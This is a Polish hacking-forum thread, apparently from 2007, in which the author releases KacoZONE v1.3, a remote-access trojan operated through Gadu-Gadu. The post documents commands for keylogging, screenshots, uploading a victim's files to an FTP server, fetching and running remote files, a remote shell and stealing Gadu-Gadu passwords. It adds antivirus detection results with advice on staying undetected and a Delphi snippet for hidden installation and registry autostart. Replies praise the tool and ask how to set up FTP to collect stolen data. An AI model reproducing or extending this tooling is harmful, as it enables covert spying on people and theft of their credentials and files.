Temat: KacoZONE v1.3 [Download]! Znowu nowa wersja!

KacoZONE v1.3


Funkcje:

end kill :
Wylacza KacoZONE, do ponownego uruchomienia komputera ofiary

end uninstall :
Usuwa bezpowrotnie KacoZONE, z komputera ofiary

dir on :
Uruchamia tryb przegladania katalogow

dir off :
Wylacza przegladanie katalogow

keylogger on :
Uruchamia logowanie klawiszy

keylogger off :
Wylacza logowanie klawiszy keylogger log/txt :
Wysyla na FTP logi klawiszy

keylogger log :
Wysyla przez GG logi keyloggera

keylogger clear :
Czysci logi keyloggera

ftp connect :
Laczy z FTP

ftp disconnect :
Rozlacza z FTP

ftp screen :
Wysyla obraz z pulpitu na FTP

ftp download :
Pobiera na dysk ofiary plik z FTP,
Wzor:
ftp download|Nazwa_pliku_na_ftp|Sciezka_Zapisu
Przyklad:
ftp download|KacoZONE.exe|C:KacoZONE.exe

ftp upload :
Wysyla na FTP plik z dysku ofiary,
Wzor:
ftp upload|Sciezka_pliku|Nazwa_zapisu_na_ftp
Przyklad:
ftp upload|C:KacoZONE.exe|Kaconzek.exe

hide deskop :
Ukrywa wszystko z pulpitu

show deskop :
Pokazuje wszystko co ma byc na pulpicie

windows exit :
Wylacza komputer ofiary

windows reboot :
Resetuje komputer ofiary

cmd on :
Uruchamia powloke polecen

cmd off :
Wylacza powloke polecen

uruchom :
Uruchamia wskazany plik,
Wzor:
uruchom|Sciezka_pliku
Przyklad:
uruchom|C:KacoZONE.exe

delete :
Usuwa wskazany plik,
Wzor:
delete|Sciezka_pliku
Przyklad:
delete|C:KacoZONE.exe

info :
Pobiera informacje o ofierze

gg pass :
Pobiera hasła z Gadu-Gadu

help :
Wysyla te wiadomosc

wyslij :
Wysyla na wskazany numer wiadomosc,
Wzor:
wyslij|NUMER|Tresc_wiadomosci
Przyklad:
wyslij|2664558|Siemka

schowek :
Zapisuje do schowka dany text,
Wzor:
schowek|Text
Przyklad:
schowek|hehe

messagebox :
Wyswietla komunikat,
Wzor:
messagebox|Tytul|Komunikat|Ikona|Przycisk
Ikony:
WARNING
INFORMATION
ERROR
QUESTION
HAND
Przyciski:
OK
YESNO
YESNOCANCEL
ABORTRETRYIGNORE
OKCANCEL
Przyklad:
messagebox|Windows Error|Czy wiesz ze jakis pedal siedzi w systemie Windows?|WARNING|YESNO

task list :
Pobiera liste aktywnych procesow

kill :
Zabija wskazany proces,
Wzor:
kill|Nazwa_procesu
Przyklad:
kill|KacoZONE.exe
reset :
Resetuje KacoZONE


## KONFIGURACJA: ##

konfiguracja :
Informuje o akualnej konfiguracji

ustaw ggsn :
Ustawia podany numer serwera
Wzor:
ustaw ggsn|NUMER
Przyklad: ustaw ggsn|00000

ustaw ggsh :
Ustawia haslo serwera
Wzor:
ustaw ggsh|HASLO
Przyklad:
ustaw ggsh|moje_haslo

ustaw ggcn :
Ustawia numer klienta
Wzor:
ustaw ggcn|NUMER
Przyklad:
ustaw ggcn|123456

ustaw ftph :
Ustawia host FTP
Wzor:
ustaw ftph|HOST
Przyklad:
ustaw ftph|kacozone.pl

ustaw ftpu :
Ustawia usera FTP
Wzor:
ustaw ftpu|NAZWA_USERA
Przyklad:
ustaw ftpu|admin@kacozone.pl

ustaw ftpp :
Ustawia port FTP
Wzor:
ustaw ftpp|NUMER_PORTU
Przyklad:
ustaw ftpp|32

ustaw ftppas :
Ustawia pasywnosc FTP
Wzor:
ustaw ftppas|true/false
Przyklad:
ustaw ftpas|true

ustaw ftppass :
Ustawia haslo FTP
Wzor:
ustaw ftppass|HASLO
Przyklad:
ustaw ftppass|moje_haslo[/b]

// Żeby nie było wątpliwości, KacoZONE został napisany w Delphi, a dokładniej w aplikacji konsolowej


Wykrywalność z dnia 22.12.2007:

Plik KacoZONE.exe otrzymany 2007.12.22 12:38:00 (CET)
Antywirus Wersja Ostatnia aktualizacja Wynik
AhnLab-V3 2007.12.22.10 2007.12.21 -
AntiVir 7.6.0.46 2007.12.22 HEUR/Malware
Authentium 4.93.8 2007.12.21 -
Avast 4.7.1098.0 2007.12.21 -
AVG 7.5.0.503 2007.12.21 -
BitDefender 7.2 2007.12.22 -
CAT-QuickHeal 9.00 2007.12.22 -
ClamAV 0.91.2 2007.12.22 -
DrWeb 4.44.0.09170 2007.12.21 -
eSafe 7.0.15.0 2007.12.20 -
eTrust-Vet 31.3.5395 2007.12.21 -
Ewido 4.0 2007.12.21 -
FileAdvisor 1 2007.12.22 -
Fortinet 3.14.0.0 2007.12.22 -
F-Prot 4.4.2.54 2007.12.21 -
F-Secure 6.70.13030.0 2007.12.21 -
Ikarus T3.1.1.15 2007.12.22 -
Kaspersky 7.0.0.125 2007.12.22 Heur.Trojan.Generic
McAfee 5191 2007.12.21 -
Microsoft 1.3109 2007.12.22 -
NOD32v2 2740 2007.12.21 probably unknown NewHeur_PE virus
Norman 5.80.02 2007.12.21 -
Panda 9.0.0.4 2007.12.22 Suspicious file
Prevx1 V2 2007.12.22 -
Rising 20.23.51.00 2007.12.22 -
Sophos 4.24.0 2007.12.22 -
Sunbelt 2.2.907.0 2007.12.21 -
Symantec 10 2007.12.22 -
TheHacker 6.2.9.167 2007.12.21 -
VBA32 3.12.2.5 2007.12.21 -
VirusBuster 4.3.26:9 2007.12.21 -
Webwasher-Gateway 6.6.2 2007.12.22 Heuristic.Malware
Dodatkowe informacje
File size: 688206 bytes
MD5: 9e6cf3d70fe8b653f18b11375b868da1
SHA1: 7f300bc348bf83ed58d6fad07a758cf28581f84c
PEiD: -[/b]

Jak chcecie mieć go mało wykrywalnego, lepiej nie skanujcie tymi online skanerami.
Co do wykrywalności mnie to jest obojętne, skanowaniem sami sobie szkodzicie.


Wersja 1.2! W wersji 1.2 zmieniono:

- poprawiono łączenie
- dodano opcję "pass gg", która wykrada hasła Gadu-Gadu[/b]

Wersja 1.3:

- poprawiono opcje "pass gg"
- dynamiczne położenie serwera
- zamiast do klucza "Run" serwer instauje sie do klucza "RunServices"
- zablokowano "multi" uruchomienie serwera, serwer wyłącza się gdy jest
już uruchomiony[/b]

Małe wytłumaczenie co do dynamicznego położenia serwera.
Kawałek kodu instalacyjnego:

Kod:

if (SAVE_PATH<>ParamStr(0))and('C:Windowsgg.exe'<>ParamStr(0)) then begin

 if not DirectoryExists(ExtractFilePath(SAVE_PATH)) then

**ForceDirectories(ExtractFilePath(SAVE_PATH));

 if FileExists(SAVE_PATH) then begin

**CopyFile(PChar(ParamStr(0)), PChar('C:Windowsgg.exe'), False); WinDupa(PChar('C:Windowsgg.exe'), SW_HIDE); DodajToAutostart('C:Windowsgg.exe')

 end else begin

**CopyFile(PChar(ParamStr(0)), PChar(SAVE_PATH), False);

**WinDupa(PChar(SAVE_PATH), SW_HIDE);

**DodajToAutostart(SAVE_PATH)

 end;

 Sleep(3000);

 Appz.Terminate;

 Exit; 

end;

Jeżeli na podanej ścieżce zapisu plik taki już istnieje, serwer instaluje się w standardowe miejsce: "C:Windowsgg.exe".

Instalacja:
Program instaluje się do: Dynamicznie :]
Dodaje sie do rejestru: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentV ersionRunServices



Konfigurator okienkowy:
DOWNLOAD

Brawo. Szczególnie że jest dostęp do konsoli poleceń dos
Przydała by się szczepionka.exe [unistall] bo zaraz jacyś dziwni ludzie będą pytać jak usunąć bo nie potrafią zabić procesu, usunąć wpisu i usunąć plik .

Czcionki wam się instalują jak ma być? Bo nie testowałem konfiguratorów na żadnym komputerze, oprócz na moim

Sugestia:

Trojan łączy się z serwerem GG pomimo tego, że ofiara nie ma jeszcze podłączenia do sieci, co powoduje blokadę Trojana.

Przydałoby się dopisać coś, co sprawdza, czy ofiara ma podłączenie do sieci. I najlepiej, aby cały czas sprawdzane było podłączenie, na wypadek gdyby ofiara wyłączyła się z interenetu na jakiś czas.

Originally posted by duzers
Trojan łączy się z serwerem GG pomimo tego, że ofiara nie ma jeszcze podłączenia do sieci, co powoduje blokadę Trojana.

Jeżeli tak jest i autor KacoZONE pisał w Object Pascal > Delphi to polecam przejrzeć:
http://www.haker.com.pl/forum/viewtopic.php?t=26641

Gites tscripter ; ] , imo GJ

A jak z wykrywalnością ;>
nie chce skanować na tych internetowych żeby nie zwiększać...

Dark Smark uwierz mi, że nie w tym tkwi problem, że nie mam pętli na łączenie.
Błąd znalazłem i zajmie mi to trochę czasu poprawienie tego. Najprawdopodobniej jeszcze dziś wieczorem będzie poprawiona wersja.

`Ja mam problem z połączeniem do serweru FTP pisze mi że nie można się połączyć a serwer stworzyłem już w 2 miejscach. W czym może tkwić problem?

nie wpisuj przed FTP://

Wykrywalność jest mała.

NIE SPRAWDZAć WYKRYWALNOśCI NA STRONACH...JUż LEPIEJ ZAINSTALOWAC ANTYW NA KOMPIE.!

Ok poprawiłem łączenie serwera Reupload pobierać! Poprawiono również wyłączanie CMD Thx duzers za pomoc

:beksa: ;[ lacze:
Buuuu! No co za pech!!
Wykrywalność rzeczywiście mała, ale akurat AntiVir musiał go wykryć!
Zależało mi osobiście najbardziej, żeby włeśnie ten av go nie wykrywał, a tu klops

Mam problem. Sorry, ze zadaję głupie pytania, ale jestem zupelnie nowy. Czy ktos moglby mi powiedziec co muszę wpisac w miejsca "File Transfer Protocol"? mam konto na freehost.pl.
Nie wiem co mam wpisac w Host, Port i User... ;/ z Góry dzięki

Kawał dobrej roboty Wkoncu cos ala Hijacker czy jak to sie zwalo Tylko wytestowac dzialanie bo wykrywalnosc jest znikoma